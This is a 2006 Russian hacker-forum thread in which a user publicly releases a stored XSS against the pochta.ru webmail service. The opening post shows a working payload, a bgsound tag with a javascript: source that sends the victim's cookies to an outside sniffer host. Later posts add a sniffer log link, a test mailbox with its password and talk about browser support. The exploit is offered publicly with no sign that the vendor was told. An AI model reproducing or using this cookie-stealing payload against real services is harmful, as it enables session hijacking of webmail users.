Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Активная XSS на http://pochta.ru/ |
07.12.2006, 12:51
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Активная XSS на http://pochta.ru/
Короче делать было нечего, решил поискать баги в каком нето почтовике. В начале был выбран e-mail.ru, но после того как я зарегал там ящик он отправился быстренька в даун (всегда говорил что сервис - ацтой)  . так как неизвестно было когда он оттуда вернется, я всмомнил про еще один очень интересный почтовик (тоже глючной)) - pochta.ru . Туда то я и направился Я зарегал там тестовый ящик и начал осмотр, то есть слать всякую фигню самому себе))). Первым что я попробовал было:
Код HTML:
<img src="javascript:alert()">
Ну естессно это не прокатило, фильтры все обрезали (заразы). Сделав еще несколько безуспешных попыток я заюзал такую конструкцию:
Код:
<bgsound src="javascript:alert()">
Алерт вылетал!!! Ндысь, видимо горе кодеры незнали, что на веб-странички можно ставить звук и какой тег нужен)))ну лана их проблемы))))Дальше я начал составлять XSS-сплоит который остылал бы куки на сниффер. Почему то начально придуманный мной отказался работать, тут я посоветовался с Pete®'ом и он предложил следующюю конструкцию:
Код:
<bgsound src='javascript:document.images[0].src="http://sniffer.ru?"+document.cookie'>
которая оказалась рабочей в этой истории можно было бы поставить большую и жирную точку, если бы не несколько факторов. Я тестил XSS на последней версии Оперы, после захода под IE оказалось что в ослике дырявость не пашет!!!!!Очень странно, я так и не въехал почему)))) Уязвимость я обнаружил в 6.12.06 21-00 по Москве. Выкладываю в паблик 7.12.06 11-50 по Москве....засекайте время )))))))). |
|
|
07.12.2006, 13:04
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Проверил в ie, "лисе", опере...нигде не работает...
|
|
|
|
07.12.2006, 14:07
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Opera 9.10 пашет, в остальных не знаю. Если у кого то вызывают недоверие мои слова, можете взлянуть лог сниффера http://antichat.ru/s/sibon/log.php . Возможно (гыгы) письма отпраляешь не в HTML формате. Действие функции alert() можно посмотреть на тестовом ящике nkvd777@pochta.ru пароль: 123321 . там только одно письмо тема - "Недоверие", директория: "Спам"
З.Ы. еще раз говорю - мой браузер был Opera 9.10 за работоспособность узявимочти в других не отвечаю)
Последний раз редактировалось А®ТеS; 07.12.2006 в 14:11..
|
|
|
|
07.12.2006, 14:12
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
я конечно могу ошибаться, но эта уязвимость уже очень старая =\
|
|
|
|
07.12.2006, 14:40
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
ХЗ, может и старая, главное чтобы работала) я например токо вчера обнаружил..
|
|
|
|
07.12.2006, 16:00
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
Проект бажный, там таких уязвимостей море, особенной ценности не представляют, но в порядке боевых учений одобряю, +1. По-моему, там даже база из XSSTester актуальна.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
|
|
|
|
08.12.2006, 01:04
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796
Репутация:
1095
|
|
ниче странного, что в других браузерах не пашет:
<bgsound src="javascript:alert()"> - это только для Оперы.. (но думается, можно и для других браузеров найти варианты)
Dronga прав, на Почте всегда было много уязвимостей..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
